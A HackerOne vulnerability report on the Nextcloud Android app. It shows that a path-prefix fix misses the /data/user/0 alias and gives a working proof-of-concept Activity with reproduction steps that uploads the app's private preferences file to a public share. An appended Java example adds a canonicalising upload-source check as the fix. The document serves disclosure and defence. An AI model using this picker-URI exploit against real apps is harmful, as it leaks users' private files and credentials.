HackerOne report H1:1408692 by luchua
History: Nov 23, 2021 - 11:44 p.m.

Nextcloud: Access to arbitrary file of the Nextcloud Android app from within the Nextcloud Android app

2021-11-23 23:44:09
luchua
hackerone.com
$250
17
arbitrary file leak
nextcloud android
security patch

EPSS

0

Percentile

9.9%

Summary:

The Android client of Nextcloud (com.nextcloud.client) allows arbitrary files, including protected/private files of the app itself, to be leaked through the file upload functionality.

Steps To Reproduce:

Report 1142918 was previously submitted for the vulnerability of leaking arbitrary protected files. Nextcloud added a fix on May 18, 2021, which added the following check to the class src/main/java/com/owncloud/android/files/services/FileUploader.java:

        if (file.getStoragePath().startsWith("/data/data/")) {
            Log_OC.d(TAG, "Upload from sensitive path is not allowed");
            return;
        }

The fix checks whether a file to be uploaded has a path starting with “/data/data”. However, the check is not sufficient: on Android, /data/data is a symlink to /data/user/0, so the same private directory is also reachable under the path “/data/user/0/”, e.g. “/data/user/0/com.nextcloud.client/”, which the prefix check does not catch. A program to exploit this vulnerability can be:

import android.content.Intent;
import android.net.Uri;
import android.os.Bundle;
import android.util.Log;
import androidx.annotation.Nullable;
import androidx.appcompat.app.AppCompatActivity;

// Activity offered to the "upload content from other apps" picker. Instead of returning
// one of its own files, it returns a file:// URI that points into the Nextcloud client's
// private storage, using the /data/user/0 alias that the "/data/data/" prefix check misses.
public class EvilActivity extends AppCompatActivity {
    private static final String LOG_TAG = EvilActivity.class.getName();

    final static String PRIVATE_URI = "file:///data/user/0/com.nextcloud.client/shared_prefs/com.nextcloud.client_preferences.xml";

    @Override
    protected void onCreate(@Nullable Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_main);

        Log.d(LOG_TAG, "EvilActivity started!");
        // -1 is Activity.RESULT_OK: the calling app treats the returned URI as the picked file.
        setResult(-1, new Intent().setData(Uri.parse(PRIVATE_URI)));
        finish();
    }
}

A working POC is as follows:

1. Install and log in to the Nextcloud Android client, e.g. through the provider https://us.cloudamo.com

2. Create a directory and set it ‘shareable’

3. Install the POC app with the program above

4. Navigate to the shareable directory from step 2, click ‘+’, then choose “upload content from other apps”

5. Select “poc”; the protected file is then uploaded to the shared folder, which is publicly shared, and is leaked.

Supporting Material/References:

A sample screenshot with protected files uploaded and their content is:
{F1523976}
{F1523979}


Impact

Arbitrary sensitive files of the Nextcloud Android client can be leaked. To address this issue, disallow any file whose path contains the package name but is not in Nextcloud's temp or cache folder.

Please investigate. Thanks.
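The mitigation proposed in the Impact section, as an added example that is not part of the report or of Nextcloud's code: the candidate path is canonicalised (collapsing “..” segments and, where the file exists, resolving symlinks such as /data/data -> /data/user/0), then refused if it lies under any alias of the app's private data directory unless it is inside the app's own cache/temp folders. The private roots, the cache directory and the sample paths are constructed for the demonstration; in the app they would come from Context.getDataDir() and Context.getCacheDir().

```java
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.Paths;
import java.util.ArrayList;
import java.util.List;

/** Upload-source policy: refuse files inside the app's private data directory (any alias of it),
 *  except its own cache/temp folders, deciding on the canonicalised path rather than a string prefix. */
public final class UploadSourcePolicy {
    private final List<Path> privateRoots = new ArrayList<>(); // Context.getDataDir() and its /data/data alias
    private final List<Path> allowedDirs = new ArrayList<>();  // e.g. Context.getCacheDir(), the app's temp dir

    public UploadSourcePolicy(List<Path> privateRoots, List<Path> allowedDirs) throws IOException {
        for (Path p : privateRoots) this.privateRoots.add(canonical(p));
        for (Path p : allowedDirs) this.allowedDirs.add(canonical(p));
    }
    /** Collapses ".." segments and, when the path exists, resolves symlinks
     *  (on Android /data/data is a symlink to /data/user/0, so both spellings end up identical). */
    static Path canonical(Path p) throws IOException {
        Path abs = p.toAbsolutePath().normalize();
        return Files.exists(abs) ? abs.toRealPath() : abs;
    }
    /** Returns true if the file may be used as an upload source. */
    public boolean isAllowedSource(Path candidate) throws IOException {
        Path real = canonical(candidate);
        for (Path allowed : allowedDirs) {
            if (real.startsWith(allowed)) return true; // Path.startsWith is component-wise, not a string prefix
        }
        for (Path root : privateRoots) {
            if (real.startsWith(root)) return false;   // anything else inside the sandbox is refused
        }
        return true;                                   // outside the app's private storage
    }

    public static void main(String[] args) throws IOException {
        String pkg = "com.nextcloud.client"; // constructed sample paths; on a device use Context.getDataDir() etc.
        UploadSourcePolicy policy = new UploadSourcePolicy(
            List.of(Paths.get("/data/user/0", pkg), Paths.get("/data/data", pkg)),
            List.of(Paths.get("/data/user/0", pkg, "cache")));
        String[] samples = {
            "/data/data/" + pkg + "/shared_prefs/" + pkg + "_preferences.xml",   // caught by the original check
            "/data/user/0/" + pkg + "/shared_prefs/" + pkg + "_preferences.xml", // the alias used in the report
            "/data/user/0/" + pkg + "/cache/../shared_prefs/" + pkg + "_preferences.xml", // ".." out of cache
            "/data/user/0/" + pkg + "/cache/upload.tmp",                          // allowed: app's own cache
            "/storage/emulated/0/DCIM/photo.jpg" };                               // allowed: ordinary user file
        for (String s : samples) System.out.println((policy.isAllowedSource(Paths.get(s)) ? "allow  " : "reject ") + s);
    }
}
```

Running it prints reject for the first three samples and allow for the last two; on a real device toRealPath() additionally collapses any symlink alias of the data directory onto the same canonical root, so the decision no longer depends on which spelling of the path the other app returned.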
